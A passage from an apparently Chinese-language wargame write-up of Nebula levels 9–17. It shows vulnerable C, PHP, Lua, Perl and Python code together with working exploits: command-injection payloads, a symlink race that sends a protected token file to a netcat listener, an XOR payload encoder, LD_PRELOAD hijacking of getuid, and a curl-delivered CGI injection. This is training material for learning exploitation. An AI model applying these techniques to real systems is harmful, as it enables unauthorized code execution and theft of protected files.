class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p>这题有两个可控点，<code>$filename</code>和<code>$use_me</code><br>然后涉及到两个知识点，一个是preg_replace已经被弃用的的/e(见[<a href="http://php.net/manual/zh/reference.pcre.pattern.modifiers.php#reference.pcre.pattern.modifiers.eval" target="_blank" rel="external">http://php.net/manual/zh/reference.pcre.pattern.modifiers.php#reference.pcre.pattern.modifiers.eval</a>])<br>会转义单引号，双引号，反斜杠和NULL，然后还会执行spam(“\2”)。。然后涉及到第二个知识点([ttp://php.net/manual/en/language.types.string.php#language.types.string.parsing]):<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">level09@nebula:/home/flag09$ vim /tmp/payload</div><div class="line">[email &#123;$&#123;system($use_me)&#125;&#125;]</div><div class="line">level09@nebula:/home/flag09$ ./flag09 /tmp/payload whoami</div><div class="line">flag09</div><div class="line">level09@nebula:/home/flag09$ ./flag09 /tmp/payload getflag</div><div class="line">You have successfully executed getflag on a target account</div></pre></td></tr></table></figure></p>
<h1 id="Level10"><a href="#Level10" class="headerlink" title="Level10"></a>Level10</h1><p>这题又是C代码审计，本题目标是读取token文件内容<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div></pre></td><td class="code"><pre><div class="line">#include &lt;stdlib.h&gt;</div><div class="line">#include &lt;unistd.h&gt;</div><div class="line">#include &lt;sys/types.h&gt;</div><div class="line">#include &lt;stdio.h&gt;</div><div class="line">#include &lt;fcntl.h&gt;</div><div class="line">#include &lt;errno.h&gt;</div><div class="line">#include &lt;sys/socket.h&gt;</div><div class="line">#include &lt;netinet/in.h&gt;</div><div class="line">#include &lt;string.h&gt;</div><div class="line"></div><div class="line">int main(int argc, char **argv)</div><div class="line">&#123;</div><div class="line">  char *file;</div><div class="line">  char *host;</div><div class="line"></div><div class="line">  if(argc &lt; 3) &#123;</div><div class="line">      printf(&quot;%s file host\n\tsends file to host if you have access to it\n&quot;, argv[0]);</div><div class="line">      exit(1);</div><div class="line">  &#125;</div><div class="line"></div><div class="line">  file = argv[1];</div><div class="line">  host = argv[2];</div><div class="line"></div><div class="line">  if(access(argv[1], R_OK) == 0) &#123;</div><div class="line">      int fd;</div><div class="line">      int ffd;</div><div class="line">      int rc;</div><div class="line">      struct sockaddr_in sin;</div><div class="line">      char buffer[4096];</div><div class="line"></div><div class="line">      printf(&quot;Connecting to %s:18211 .. &quot;, host); fflush(stdout);</div><div class="line"></div><div class="line">      fd = socket(AF_INET, SOCK_STREAM, 0);</div><div class="line"></div><div class="line">      memset(&amp;sin, 0, sizeof(struct sockaddr_in));</div><div class="line">      sin.sin_family = AF_INET;</div><div class="line">      sin.sin_addr.s_addr = inet_addr(host);</div><div class="line">      sin.sin_port = htons(18211);</div><div class="line"></div><div class="line">      if(connect(fd, (void *)&amp;sin, sizeof(struct sockaddr_in)) == -1) &#123;</div><div class="line">          printf(&quot;Unable to connect to host %s\n&quot;, host);</div><div class="line">          exit(EXIT_FAILURE);</div><div class="line">      &#125;</div><div class="line"></div><div class="line">#define HITHERE &quot;.oO Oo.\n&quot;</div><div class="line">      if(write(fd, HITHERE, strlen(HITHERE)) == -1) &#123;</div><div class="line">          printf(&quot;Unable to write banner to host %s\n&quot;, host);</div><div class="line">          exit(EXIT_FAILURE);</div><div class="line">      &#125;</div><div class="line">#undef HITHERE</div><div class="line"></div><div class="line">      printf(&quot;Connected!\nSending file .. &quot;); fflush(stdout);</div><div class="line"></div><div class="line">      ffd = open(file, O_RDONLY);</div><div class="line">      if(ffd == -1) &#123;</div><div class="line">          printf(&quot;Damn. Unable to open file\n&quot;);</div><div class="line">          exit(EXIT_FAILURE);</div><div class="line">      &#125;</div><div class="line"></div><div class="line">      rc = read(ffd, buffer, sizeof(buffer));</div><div class="line">      if(rc == -1) &#123;</div><div class="line">          printf(&quot;Unable to read from file: %s\n&quot;, strerror(errno));</div><div class="line">          exit(EXIT_FAILURE);</div><div class="line">      &#125;</div><div class="line"></div><div class="line">      write(fd, buffer, rc);</div><div class="line"></div><div class="line">      printf(&quot;wrote file!\n&quot;);</div><div class="line"></div><div class="line">  &#125; else &#123;</div><div class="line">      printf(&quot;You don&apos;t have access to %s\n&quot;, file);</div><div class="line">  &#125;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>我们需要给该程序传递两个参数，一个file(文件名), 一个host(主机名)，这个程序的功能是，先检查file是否可读，如果可读，则与host:18211建立tcp连接，然后open(file)，发送文件内容。如下测试该程序功能：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line">level10@nebula:/home/flag10$ vim /tmp/a</div><div class="line">ffffff</div><div class="line">--------</div><div class="line">; 在本机(192.168.56.1)上</div><div class="line">$ while [ 1 ];do nc -l 18211; done</div><div class="line">--------</div><div class="line">level10@nebula:/home/flag10$ ./flag10 /tmp/a 192.168.56.1</div><div class="line">Connecting to 192.168.56.1:18211 .. Connected!</div><div class="line">Sending file .. wrote file!</div><div class="line">--------</div><div class="line">; 本机</div><div class="line">.oO Oo.</div><div class="line">ffffff</div></pre></td></tr></table></figure></p>
<p>本题的漏洞在于，先是检查文件是否可读，但是并没有打开，如果检查完文件可读之后，在建立tcp连接的过程中，我把文件改成一个level10不可读，但是flag10可读的文件，程序任然能正常运行，过程如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">level10@nebula:/home/flag10$ vim /tmp/level10.sh</div><div class="line">#!/bin/sh</div><div class="line">while [ 1 ];</div><div class="line">do</div><div class="line">        ln -sf /tmp/a /tmp/fff</div><div class="line">        ln -sf /home/flag10/token /tmp/fff     </div><div class="line">done</div><div class="line">level10@nebula:/home/flag10$ bash /tmp/level10.sh</div><div class="line">level10@nebula:/home/flag10$ while [ 1 ]; do ./flag10 /tmp/fff 192.168.56.1; done</div><div class="line">-----------</div><div class="line">; 你会在本机上看到token文件内容</div></pre></td></tr></table></figure></p>
<h1 id="Level11"><a href="#Level11" class="headerlink" title="Level11"></a>Level11</h1><p>还是C代码审计<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div></pre></td><td class="code"><pre><div class="line">#include &lt;stdlib.h&gt;</div><div class="line">#include &lt;unistd.h&gt;</div><div class="line">#include &lt;string.h&gt;</div><div class="line">#include &lt;sys/types.h&gt;</div><div class="line">#include &lt;fcntl.h&gt;</div><div class="line">#include &lt;stdio.h&gt;</div><div class="line">#include &lt;sys/mman.h&gt;</div><div class="line"></div><div class="line">/*</div><div class="line"> * Return a random, non predictable file, and return the file descriptor for it.</div><div class="line"> */</div><div class="line"></div><div class="line">int getrand(char **path)</div><div class="line">&#123;</div><div class="line">  char *tmp;</div><div class="line">  int pid;</div><div class="line">  int fd;</div><div class="line"></div><div class="line">  srandom(time(NULL));</div><div class="line"></div><div class="line">  tmp = getenv(&quot;TEMP&quot;);</div><div class="line">  pid = getpid();</div><div class="line">  </div><div class="line">  asprintf(path, &quot;%s/%d.%c%c%c%c%c%c&quot;, tmp, pid,</div><div class="line">      &apos;A&apos; + (random() % 26), &apos;0&apos; + (random() % 10),</div><div class="line">      &apos;a&apos; + (random() % 26), &apos;A&apos; + (random() % 26),</div><div class="line">      &apos;0&apos; + (random() % 10), &apos;a&apos; + (random() % 26));</div><div class="line"></div><div class="line">  fd = open(*path, O_CREAT|O_RDWR, 0600);</div><div class="line">  unlink(*path);</div><div class="line">  return fd;</div><div class="line">&#125;</div><div class="line"></div><div class="line">void process(char *buffer, int length)</div><div class="line">&#123;</div><div class="line">  unsigned int key;</div><div class="line">  int i;</div><div class="line"></div><div class="line">  key = length &amp; 0xff;</div><div class="line"></div><div class="line">  for(i = 0; i &lt; length; i++) &#123;</div><div class="line">      buffer[i] ^= key;</div><div class="line">      key -= buffer[i];</div><div class="line">  &#125;</div><div class="line"></div><div class="line">  system(buffer);</div><div class="line">&#125;</div><div class="line"></div><div class="line">#define CL &quot;Content-Length: &quot;</div><div class="line"></div><div class="line">int main(int argc, char **argv)</div><div class="line">&#123;</div><div class="line">  char line[256];</div><div class="line">  char buf[1024];</div><div class="line">  char *mem;</div><div class="line">  int length;</div><div class="line">  int fd;</div><div class="line">  char *path;</div><div class="line"></div><div class="line">  if(fgets(line, sizeof(line), stdin) == NULL) &#123;</div><div class="line">      errx(1, &quot;reading from stdin&quot;);</div><div class="line">  &#125;</div><div class="line"></div><div class="line">  if(strncmp(line, CL, strlen(CL)) != 0) &#123;</div><div class="line">      errx(1, &quot;invalid header&quot;);</div><div class="line">  &#125;</div><div class="line"></div><div class="line">  length = atoi(line + strlen(CL));</div><div class="line">  </div><div class="line">  if(length &lt; sizeof(buf)) &#123;</div><div class="line">      if(fread(buf, length, 1, stdin) != length) &#123;</div><div class="line">          err(1, &quot;fread length&quot;);</div><div class="line">      &#125;</div><div class="line">      process(buf, length);</div><div class="line">  &#125; else &#123;</div><div class="line">      int blue = length;</div><div class="line">      int pink;</div><div class="line"></div><div class="line">      fd = getrand(&amp;path);</div><div class="line"></div><div class="line">      while(blue &gt; 0) &#123;</div><div class="line">          printf(&quot;blue = %d, length = %d, &quot;, blue, length);</div><div class="line"></div><div class="line">          pink = fread(buf, 1, sizeof(buf), stdin);</div><div class="line">          printf(&quot;pink = %d\n&quot;, pink);</div><div class="line"></div><div class="line">          if(pink &lt;= 0) &#123;</div><div class="line">              err(1, &quot;fread fail(blue = %d, length = %d)&quot;, blue, length);</div><div class="line">          &#125;</div><div class="line">          write(fd, buf, pink);</div><div class="line"></div><div class="line">          blue -= pink;</div><div class="line">      &#125;    </div><div class="line"></div><div class="line">      mem = mmap(NULL, length, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);</div><div class="line">      if(mem == MAP_FAILED) &#123;</div><div class="line">          err(1, &quot;mmap&quot;);</div><div class="line">      &#125;</div><div class="line">      process(mem, length);</div><div class="line">  &#125;</div><div class="line"></div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>这题应该不是很难，能看懂代码应该就能解出来，贴下我的payload脚本<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div></pre></td><td class="code"><pre><div class="line">#payload.py</div><div class="line">#!/usr/bin/env python</div><div class="line">#-*- coding:utf-8 -*-</div><div class="line">import sys</div><div class="line"></div><div class="line">def my_w_file(content):</div><div class="line">	f = open(&quot;payload&quot;, &quot;w&quot;)</div><div class="line">	f.write(content)</div><div class="line">	f.close()</div><div class="line">	</div><div class="line">	</div><div class="line">def main(command):</div><div class="line">	command += &quot;\x00&quot;</div><div class="line">	length = 1024</div><div class="line">	count_length = length &amp; 0xff</div><div class="line">	payload_command = &quot;&quot;</div><div class="line">	for x in command:</div><div class="line">		payload_command += chr((ord(x) ^ count_length) &amp; 0xff)</div><div class="line">		count_length -= ord(x)</div><div class="line">	payload_command += chr(count_length &amp; 0xff)</div><div class="line">	payload = &quot;Content-Length: &quot; + str(length) + &quot;\n&quot; + payload_command + &quot;A&quot; * (length - len(payload_command) )</div><div class="line">	print payload</div><div class="line">	#my_w_file(payload)</div><div class="line"></div><div class="line">if __name__ == &apos;__main__&apos;:</div><div class="line">	if len(sys.argv) == 2:</div><div class="line">		main(sys.argv[1])</div><div class="line">		</div><div class="line"># $ python payload.py whoami | /home/flag11/flag11</div><div class="line"># level11</div><div class="line"># (╯‵□′)╯︵┻━┻  这特么。。。不做了。。看了涛涛的博客，还有第二种更简单的方法，可是都不行。。。shit!</div></pre></td></tr></table></figure></p>
<h1 id="Level12"><a href="#Level12" class="headerlink" title="Level12"></a>Level12</h1><p>lua脚本的代码审计，好像是个后门脚本。。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div></pre></td><td class="code"><pre><div class="line">local socket = require(&quot;socket&quot;)</div><div class="line">local server = assert(socket.bind(&quot;127.0.0.1&quot;, 50001))</div><div class="line"></div><div class="line">function hash(password)</div><div class="line">  prog = io.popen(&quot;echo &quot;..password..&quot; | sha1sum&quot;, &quot;r&quot;)</div><div class="line">  data = prog:read(&quot;*all&quot;)</div><div class="line">  prog:close()</div><div class="line"></div><div class="line">  data = string.sub(data, 1, 40)</div><div class="line"></div><div class="line">  return data</div><div class="line">end</div><div class="line"></div><div class="line"></div><div class="line">while 1 do</div><div class="line">  local client = server:accept()</div><div class="line">  client:send(&quot;Password: &quot;)</div><div class="line">  client:settimeout(60)</div><div class="line">  local line, err = client:receive()</div><div class="line">  if not err then</div><div class="line">      print(&quot;trying &quot; .. line) -- log from where ;\</div><div class="line">      local h = hash(line)</div><div class="line"></div><div class="line">      if h ~= &quot;4754a4f4bd5787accd33de887b9250a0691dd198&quot; then</div><div class="line">          client:send(&quot;Better luck next time\n&quot;);</div><div class="line">      else</div><div class="line">          client:send(&quot;Congrats, your token is 413**CARRIER LOST**\n&quot;)</div><div class="line">      end</div><div class="line"></div><div class="line">  end</div><div class="line"></div><div class="line">  client:close()</div><div class="line">end</div></pre></td></tr></table></figure></p>
<p>这题你开着lua解释器试试就知道了。。问题在这行代码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">prog = io.popen(&quot;echo &quot;..password..&quot; | sha1sum&quot;, &quot;r&quot;)</div><div class="line">-- payload: 4754a4f4bd5787accd33de887b9250a0691dd198;getflag &gt; /tmp/get ;#</div></pre></td></tr></table></figure></p>
<p>没有对password做任何过滤，导致命令执行。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">level12@nebula:/tmp$ nc 127.0.0.1 50001</div><div class="line">Password: 4754a4f4bd5787accd33de887b9250a0691dd198;getflag &gt; /tmp/get ;#</div><div class="line">Congrats, your token is 413**CARRIER LOST**</div><div class="line">level12@nebula:/tmp$ cat /tmp/get </div><div class="line">You have successfully executed getflag on a target account</div></pre></td></tr></table></figure></p>
<p>感觉nebula有问题。。。没能getshell成功</p>
<h1 id="Level13"><a href="#Level13" class="headerlink" title="Level13"></a>Level13</h1><p>这题的C代码很简单<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div></pre></td><td class="code"><pre><div class="line">#include &lt;stdlib.h&gt;</div><div class="line">#include &lt;unistd.h&gt;</div><div class="line">#include &lt;stdio.h&gt;</div><div class="line">#include &lt;sys/types.h&gt;</div><div class="line">#include &lt;string.h&gt;</div><div class="line"></div><div class="line">#define FAKEUID 1000</div><div class="line"></div><div class="line">int main(int argc, char **argv, char **envp)</div><div class="line">&#123;</div><div class="line">  int c;</div><div class="line">  char token[256];</div><div class="line"></div><div class="line">  if(getuid() != FAKEUID) &#123;</div><div class="line">      printf(&quot;Security failure detected. UID %d started us, we expect %d\n&quot;, getuid(), FAKEUID);</div><div class="line">      printf(&quot;The system administrators will be notified of this violation\n&quot;);</div><div class="line">      exit(EXIT_FAILURE);</div><div class="line">  &#125;</div><div class="line"></div><div class="line">  // snip, sorry :)</div><div class="line"></div><div class="line">  printf(&quot;your token is %s\n&quot;, token);</div><div class="line">  </div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>代码简单了，可是不会做了，看了涛涛的wp后，学到了许多新知识<br>前置知识点1:</p>
<blockquote>
<p>LD_PRELOAD：</p>
<p>在Unix操作系统的动态链接库的世界中，LD_PRELOAD就是这样一个环境变量，它可以影响程序的运行时的链接（Runtime linker），它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入Unix操作系统不同动态链接库中的相同函数。通过这个环境变量，我们可以在主程序和其动态链接库的中间加载别的动态链接库，甚至覆盖正常的函数库。 </p>
</blockquote>
<p>这题的思路就是劫持getuid函数 :<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">myuid.c</div><div class="line">#include &lt;sys/types.h&gt;</div><div class="line">uid_t getuid(void) &#123;</div><div class="line">        //system(&quot;getflag &gt; /tmp/getflag13&quot;); getshell失败</div><div class="line">        return 1000;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>2: 编译动态链接库<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">level13@nebula:/tmp$ gcc -shared myuid.c -o myuid.so</div><div class="line">level13@nebula:/tLD_PRELOAD=/tmp/myuid.so</div><div class="line">level13@nebula:/tmp$ export LD_PRELOAD</div><div class="line">level13@nebula:/tmp$ cp /home/flag13/flag13 ./</div><div class="line">level13@nebula:/tmp$ ./flag13</div><div class="line">your token is b705702b-76a8-42b0-8844-3adabbe5ac58</div></pre></td></tr></table></figure></p>
<p>flag13和myuid.so的ruid要一样，所以把flag13 copy过来。</p>
<h1 id="Level14"><a href="#Level14" class="headerlink" title="Level14"></a>Level14</h1><p>给一个加密程序，然后解密token文件。。。。这是小学的找规律？<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">#!/usr/bin/env python</div><div class="line">#-*- coding:utf-8 -*-</div><div class="line"></div><div class="line">cipher = &quot;857:g67?5ABBo:BtDA?tIvLDKL&#123;MQPSRQWW.&quot;</div><div class="line">plain = &quot;&quot;</div><div class="line">for x in range(len(cipher)):</div><div class="line">	plain += chr(ord(cipher[x]) - x)</div><div class="line">	</div><div class="line">print plain</div></pre></td></tr></table></figure></p>
<p>得到token后<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">level14@nebula:/home/flag14$ su flag14</div><div class="line">Password: </div><div class="line">sh-4.2$ getflag</div><div class="line">You have successfully executed getflag on a target account</div><div class="line">sh-4.2$ whoami</div><div class="line">flag14</div></pre></td></tr></table></figure></p>
<h1 id="Level15"><a href="#Level15" class="headerlink" title="Level15"></a>Level15</h1><p>暂无。。。前置技能没点够，LL的wp看不懂</p>
<h1 id="Level16"><a href="#Level16" class="headerlink" title="Level16"></a>Level16</h1><p>perl代码审计<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div></pre></td><td class="code"><pre><div class="line">#!/usr/bin/env perl</div><div class="line"> </div><div class="line">use CGI qw&#123;param&#125;;</div><div class="line"> </div><div class="line">print &quot;Content-type: text/html\n\n&quot;;</div><div class="line"> </div><div class="line">sub login &#123;</div><div class="line">  $username = $_[0];</div><div class="line">  $password = $_[1];</div><div class="line"> </div><div class="line">  $username =~ tr/a-z/A-Z/; # conver to uppercase</div><div class="line">  $username =~ s/\s.*//;        # strip everything after a space</div><div class="line"> </div><div class="line">  @output = `egrep &quot;^$username&quot; /home/flag16/userdb.txt 2&gt;&amp;1`;</div><div class="line">  foreach $line (@output) &#123;</div><div class="line">      ($usr, $pw) = split(/:/, $line);</div><div class="line">   </div><div class="line"> </div><div class="line">      if($pw =~ $password) &#123;</div><div class="line">          return 1;</div><div class="line">      &#125;</div><div class="line">  &#125;</div><div class="line"> </div><div class="line">  return 0;</div><div class="line">&#125;</div><div class="line"> </div><div class="line">sub htmlz &#123;</div><div class="line">  print(&quot;&lt;html&gt;&lt;head&gt;&lt;title&gt;Login resuls&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&quot;);</div><div class="line">  if($_[0] == 1) &#123;</div><div class="line">      print(&quot;Your login was accepted&lt;br/&gt;&quot;);</div><div class="line">  &#125; else &#123;</div><div class="line">      print(&quot;Your login failed&lt;br/&gt;&quot;);</div><div class="line">  &#125;    </div><div class="line">  print(&quot;Would you like a cookie?&lt;br/&gt;&lt;br/&gt;&lt;/body&gt;&lt;/html&gt;\n&quot;);</div><div class="line">&#125;</div><div class="line"> </div><div class="line">htmlz(login(param(&quot;username&quot;), param(&quot;password&quot;)));</div></pre></td></tr></table></figure></p>
<p>问题出在这句，命令执行<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">@output = `egrep &quot;^$username&quot; /home/flag16/userdb.txt 2&gt;&amp;1`;</div></pre></td></tr></table></figure></p>
<p>然后在之前对变量 <code>$username</code>做了两次过滤<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">$username =~ tr/a-z/A-Z/; # conver to uppercase</div><div class="line">$username =~ s/\s.*//;        # strip everything after a space</div></pre></td></tr></table></figure></p>
<p>一个是把所以字母变为大写，然后去掉空格后面的内容，可以这样测试 -&gt; 在shell中输入以下命令，<code>&lt;xxx&gt;</code> 为可控区域，也就是你能输入的地方<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$ egrep &quot;^&lt;xxx&gt;&quot; /home/flag16/userdb.txt 2&gt;&amp;1</div></pre></td></tr></table></figure></p>
<p>然后 <code>&lt;xxx&gt;</code> 里的内容不应该出现空格，因为空格后面的内容都会被过滤，然后所以字母都必须是大写的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">level16@nebula:/tmp$ vim GET</div><div class="line">#!/bin/sh</div><div class="line">getflag &gt; /tmp/flag</div><div class="line">:wq</div><div class="line">level16@nebula:/tmp$ export PATH=/tmp:$PATH</div><div class="line">level16@nebula:/tmp$ GET</div><div class="line">level16@nebula:/tmp$ cat /tmp/flag </div><div class="line">getflag is executing on a non-flag account, this doesn&apos;t count</div><div class="line">level16@nebula:/tmp$ rm /tmp/flag </div><div class="line">------------------</div><div class="line">$    curl nebula:1616/index.cgi?username=%60%2f%2a%2fget%60                         </div><div class="line">------------------</div><div class="line">level16@nebula:/tmp$ cat /tmp/flag </div><div class="line">You have successfully executed getflag on a target account</div></pre></td></tr></table></figure>
<h1 id="Level17"><a href="#Level17" class="headerlink" title="Level17"></a>Level17</h1><p>( ′ロ` )终于遇到我会的语言了。。。python代码审计<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div></pre></td><td class="code"><pre><div class="line">#!/usr/bin/python</div><div class="line"></div><div class="line">import os</div><div class="line">import pickle</div><div class="line">import time</div><div class="line">import socket</div><div class="line">import signal</div><div class="line"></div><div class="line">signal.signal(signal.SIGCHLD, signal.SIG_IGN)</div><div class="line"></div><div class="line">def server(skt):</div><div class="line">  line = skt.recv(1024)</div><div class="line"></div><div class="line">  obj = pickle.loads(line)</div><div class="line"></div><div class="line">  for i in obj:</div><div class="line">      clnt.send(&quot;why did you send me &quot; + i + &quot;?\n&quot;)</div><div class="line"></div><div class="line">skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)</div><div class="line">skt.bind((&apos;0.0.0.0&apos;, 10007))</div><div class="line">skt.listen(10)</div><div class="line"></div><div class="line">while True:</div><div class="line">  clnt, addr = 